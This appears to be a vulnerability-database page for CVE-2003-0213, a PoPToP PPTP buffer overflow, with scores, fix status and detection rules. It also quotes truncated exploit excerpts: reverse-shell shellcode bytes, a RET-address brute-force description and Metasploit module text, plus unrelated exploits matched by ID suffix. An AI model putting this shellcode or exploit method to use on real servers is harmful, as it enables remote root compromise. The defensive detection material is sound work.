CVE-2003-0213
published 2003-05-12CVE-2003-0213: ctrlpacket.c in PoPToP PPTP server before 1.1.4-b3 allows remote attackers to cause a denial of service via a length field of 0 or 1, which causes a negative…
PriorityP349high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
71.03%
99.3th percentile
ctrlpacket.c in PoPToP PPTP server before 1.1.4-b3 allows remote attackers to cause a denial of service via a length field of 0 or 1, which causes a negative value to be fed into a read operation, leading to a buffer overflow.
Affected
7 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | pptpd | < pptpd 1.1.4-0.b3.2 (bookworm) | pptpd 1.1.4-0.b3.2 (bookworm) |
| poptop | pptp_server | — | — |
| poptop | pptp_server | — | — |
| poptop | pptp_server | — | — |
| poptop | pptp_server | — | — |
| poptop | pptp_server | — | — |
| poptop | pptp_server | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
\x1a\x2b\x3c\x4d (PPTP Magic Cookie)
- →Detect PPTP control connection packets (port 1723/TCP) where the PPTP length field in the header is set to 0 or 1, which is anomalous and triggers the negative read overflow in ctrlpacket.c. ↗
- →Alert on PPTP ECHO_RQST (ctrl_type=5) packets on TCP/1723 where the declared packet length field is 1 (ntohs value), as this is the specific trigger used by all known exploits for this CVE. ↗
- →Fingerprint vulnerable PoPToP servers by sending a valid START_CTRL_CONN_RQST (length=156) and checking if the response banner contains the string 'MoretonBay', which indicates a vulnerable version. ↗
- →Monitor for PPTP packets on TCP/1723 containing the magic cookie 0x1a2b3c4d followed by an anomalously small length field (0 or 1) in the PPTP header, indicating an exploitation attempt. ↗
- →Bruteforce exploitation attempts will generate many rapid sequential TCP connections to port 1723, each sending an ECHO_RQST with length=1 followed by a large payload buffer (~500 bytes of NOP sled + shellcode + return addresses). ↗
- ·The Metasploit exploit uses bruteforce RET address scanning between 0xbffff000 and 0xbffffa00 with step 0, meaning detection based on a single connection attempt may miss the attack; monitoring for repeated connections is necessary. ↗
- ·The exploit author notes that Poptop version detection is not reliable, so version-based blocking alone is insufficient; traffic-level detection on the malformed length field is required. ↗
- ·The vulnerable server by default allows only 4 concurrent manager processes, limiting the maximum number of simultaneous shells an attacker can obtain, but this does not prevent exploitation. ↗
- ·The shellcode in exploit EDB-19 embeds the attacker's IP and port directly in the payload bytes (at fixed offsets), meaning the shellcode bytes will vary per attacker; byte-signature detection should focus on the invariant NOP sled and syscall sequences rather than the full shellcode. ↗
CVSS provenance
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
osv7.5HIGH
vendor_debian7.5HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Debian
CVE-2003-0213: pptpd - ctrlpacket.c in PoPToP PPTP server before 1.1.4-b3 allows remote attackers to ca...
vendor_debian·2003·CVSS 7.5
CVE-2003-0213 [HIGH] CVE-2003-0213: pptpd - ctrlpacket.c in PoPToP PPTP server before 1.1.4-b3 allows remote attackers to ca...
ctrlpacket.c in PoPToP PPTP server before 1.1.4-b3 allows remote attackers to cause a denial of service via a length field of 0 or 1, which causes a negative value to be fed into a read operation, leading to a buffer overflow.
Scope: local
bookworm: resolved (fixed in 1.1.4-0.b3.2)
bullseye: resolved (fixed in 1.1.4-0.b3.2)
forky: resolved (fixed in 1.1.4-0.b3.2)
sid: resolved (fixed in 1.1.4-0.b3.2)
trixie: resolved (fixed in 1.1.4-0.b3.2)
GHSA
GHSA-84m7-68fc-v7c9: ctrlpacket
ghsa_unreviewed·2022-04-29
CVE-2003-0213 [HIGH] GHSA-84m7-68fc-v7c9: ctrlpacket
ctrlpacket.c in PoPToP PPTP server before 1.1.4-b3 allows remote attackers to cause a denial of service via a length field of 0 or 1, which causes a negative value to be fed into a read operation, leading to a buffer overflow.
OSV
CVE-2003-0213: ctrlpacket
osv·2003-05-12·CVSS 7.5
CVE-2003-0213 [HIGH] CVE-2003-0213: ctrlpacket
ctrlpacket.c in PoPToP PPTP server before 1.1.4-b3 allows remote attackers to cause a denial of service via a length field of 0 or 1, which causes a negative value to be fed into a read operation, leading to a buffer overflow.
No detection rules found.
Exploit-DB
Microsoft Exchange 2003 - base64-MIME Remote Code Execution
exploitdb·2019-07-05
CVE-2007-0213 Microsoft Exchange 2003 - base64-MIME Remote Code Execution
Microsoft Exchange 2003 - base64-MIME Remote Code Execution
---
# Python 2.7 (included with ImmunityDBG)
# Exchange 2003 SP0 base64-MIME memory corruption
# NSA's `ENGLISHMANSDENTIST`
# Platform: Windows Server 2003 R2
# Shout out to the Equation Group, NSA Tailored Access Operations
# Author: Charles Truscott @r0ss1n1
# Shout out to Offensive Security, from Australia with Love
import time
import socket
import base64
import struct
#payload ="eJ8+InlpAQaQCAAEAAAAAAABAAEAAgKQBgAOAAAAAAAAAAAAAAAAAAAAAAAAAAIFkAYAevwAAAEA" + "\r\n"
#payload+="AAANAAE3AQAAAGr8AAALAAAAAAAAAMAAAAAAAABG0M8R4KGxGuEAAAAAAAAAAAAAAAAAAAAAPgAD" + "\r\n"
#payload+="AP7/CQAGAAAAAAAAAAAAAAABAAAAAQAAAAAAAAAAEAAA/v///wAAAAD+////AAAAAAAAAAD/////" + "\r\n"
#payload+="//////////////////////////////////////////////////////
Exploit-DB
PoPToP - Negative Read Overflow (Metasploit)
exploitdb·2010-11-23
CVE-2003-0213 PoPToP - Negative Read Overflow (Metasploit)
PoPToP - Negative Read Overflow (Metasploit)
---
##
# $Id: poptop_negative_read.rb 11114 2010-11-23 18:12:08Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Poptop Negative Read Overflow',
'Description' => %q{
This is an exploit for the Poptop negative read overflow. This will
work against versions prior to 1.1.3-b3 and 1.1.3-20030409, but I
currently do not have a good way to detect Poptop versions.
The server will by default only allow 4 concurrent manager processes
(what we run our code in), so you could have a max of 4 shells
Exploit-DB
Microsoft Windows Server 2000 - POSIX Subsystem Privilege Escalation (MS04-020)
exploitdb·2004-07-17
CVE-2004-0213 Microsoft Windows Server 2000 - POSIX Subsystem Privilege Escalation (MS04-020)
Microsoft Windows Server 2000 - POSIX Subsystem Privilege Escalation (MS04-020)
---
/* Microsoft Windows POSIX Subsystem Local Privilege Escalation Exploit (MS04-020)
*
* Tested on windows 2k sp4 CN,NT/XP/2003 NOT TESTED
*
* Posixexp.c By bkbll (bkbll cnhonker net,bkbll tom com) www cnhonker com
*
* 2004/07/16
*
* thanks to eyas xfocus org
*
*
C:\>whoami
VITUALWIN2K\test
C:\>posixexp
Microsoft Windows POSIX Subsystem Local Privilege Escalation Exploit(1
By bkbll (bkbll#cnhonker.net,bkbll#tom.com) www.cnhonker.com
pax: illegal option--h
Usage: pax -[cimopuvy] [-f archive] [-s replstr] [-t device] [pattern.
pax -r [-cimopuvy] [-f archive] [-s replstr] [-t device] [patte
pax -w [-adimuvy] [-b blocking] [-f archive] [-s replstr]
[-t device] [-x format] [pathname...]
pax -r -w [-ilmopuvy] [
Exploit-DB
PoPToP PPTP 1.1.4-b3 - 'poptop-sane.c' Remote Command Execution
exploitdb·2003-04-25
CVE-2003-0213 PoPToP PPTP 1.1.4-b3 - 'poptop-sane.c' Remote Command Execution
PoPToP PPTP 1.1.4-b3 - 'poptop-sane.c' Remote Command Execution
---
/*
* Fixed Exploit against PoPToP in Linux (poptop-sane.c)
* ./r4nc0rwh0r3 of blightninjas ([email protected])
*
* blightninjas: bringing pain, suffering, and humiliation to the security world
* Expect more great release like helloworld-annotated.c and
* cd explained whitepaper, we are working hard in da underground
*
* Other Editions Available At:
* http://www.freewebs.com/blightninjas/
*
* *** Bugtraq Clean Edition ***
* Based off of code by [email protected]
*
* Notes on the exploit:
* This was only tested under slackware, RET_OFF could possibly
* be different.
* You can have nulls in the shellcode (the hole is in a read())
* This allows you to have ips and ports with nulls in them
*
* Shouts to ADM, TESO
Exploit-DB
PoPToP PPTP 1.1.4-b3 - Remote Command Execution
exploitdb·2003-04-18
CVE-2003-0213 PoPToP PPTP 1.1.4-b3 - Remote Command Execution
PoPToP PPTP 1.1.4-b3 - Remote Command Execution
---
/*
* exploit for a recently discovered vulnerability in PoPToP
* PPTP server under Linux. Versions affected are all prior to
* 1.1.4-b3 and 1.1.3-20030409.
* The exploit is capable of bruteforcing the RET address to find our
* buffer in the stack. Upon a successfull run it brings up a reverse
* shell with privileges of the pptpd daemon (typically root)
* on the victim server.
*/
#include
#include
#include
#define u_int8_t char
#define u_int16_t WORD
#define u_int32_t DWORD
char shellcode[] =
"\x1a\x76\xa2\x41\x21\xf5\x1a\x43\xa2\x5a\x1a\x58\xd0\x1a\xce\x6b"
"\xd0\x1a\xce\x67\xd8\x1a\xde\x6f\x1e\xde\x67\x5e\x13\xa2\x5a\x1a"
"\xd6\x67\xd0\xf5\x1a\xce\x7f\xf5\x54\xd6\x7d"
"\x01\x01" // port
"\x54\xd6\x63"
"\x01\x01\x01\x01" // ip a
Exploit-DB
PoPToP PPTP 1.0/1.1.x - Negative 'read()' Argument Remote Buffer Overflow
exploitdb·2003-04-09
CVE-2003-0213 PoPToP PPTP 1.0/1.1.x - Negative 'read()' Argument Remote Buffer Overflow
PoPToP PPTP 1.0/1.1.x - Negative 'read()' Argument Remote Buffer Overflow
---
// source: https://www.securityfocus.com/bid/7316/info
A buffer-overflow vulnerability has been discovered in PoPToP PPTP. The problem occurs because the software fails to do sufficient sanity checks when referencing user-supplied input used in various calculations. As a result, an attacker may be able to trigger a condition that would corrupt sensitive memory.
Successful exploits of this issue may allow attackers to execute arbitrary code with the privileges of the affected server.
#include
#include
#include
#include
#include
/* Ported to Linux by John Leach */
typedef int SOCKET;
typedef unsigned short WORD;
typedef unsigned int DWORD;
char shellcode[] =
"\x1a\x76\xa2\x41\x21\xf5\x1a\x43\xa2\x5a\x1a\x
Exploit-DB
PoPToP < 1.1.3-b3/1.1.3-20030409 - Negative Read Overflow (Metasploit)
exploitdb·2003-04-09
CVE-2003-0213 PoPToP < 1.1.3-b3/1.1.3-20030409 - Negative Read Overflow (Metasploit)
PoPToP 'Poptop Negative Read Overflow',
'Description' => %q{
This is an exploit for the Poptop negative read overflow. This will
work against versions prior to 1.1.3-b3 and 1.1.3-20030409, but I
currently do not have a good way to detect Poptop versions.
The server will by default only allow 4 concurrent manager processes
(what we run our code in), so you could have a max of 4 shells at once.
Using the current method of exploitation, our socket will be closed
before we have the ability to run code, preventing the use of Findsock.
},
'Author' => 'spoonm',
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
['CVE', '2003-0213'],
['OSVDB', '3293'],
['URL', 'http://securityfocus.com/archive/1/317995'],
['URL', 'http://www.freewebs.com/blightninjas/'],
],
'Privileged' => tr
Metasploit
Poptop Negative Read Overflow
metasploit
Poptop Negative Read Overflow
Poptop Negative Read Overflow
This is an exploit for the Poptop negative read overflow. This will work against versions prior to 1.1.3-b3 and 1.1.3-20030409, but I currently do not have a good way to detect Poptop versions. The server will by default only allow 4 concurrent manager processes (what we run our code in), so you could have a max of 4 shells at once. Using the current method of exploitation, our socket will be closed before we have the ability to run code, preventing the use of Findsock.
No writeups or analysis indexed.
http://marc.info/?l=bugtraq&m=105068728421160&w=2http://marc.info/?l=bugtraq&m=105154539727967&w=2http://sourceforge.net/project/shownotes.php?release_id=138437http://www.debian.org/security/2003/dsa-295http://www.kb.cert.org/vuls/id/673993http://www.novell.com/linux/security/advisories/2003_029.htmlhttp://www.securityfocus.com/archive/1/317995http://www.securityfocus.com/archive/1/319428http://www.securityfocus.com/bid/7316http://marc.info/?l=bugtraq&m=105068728421160&w=2http://marc.info/?l=bugtraq&m=105154539727967&w=2http://sourceforge.net/project/shownotes.php?release_id=138437http://www.debian.org/security/2003/dsa-295http://www.kb.cert.org/vuls/id/673993http://www.novell.com/linux/security/advisories/2003_029.htmlhttp://www.securityfocus.com/archive/1/317995http://www.securityfocus.com/archive/1/319428http://www.securityfocus.com/bid/7316
2003-05-12
Published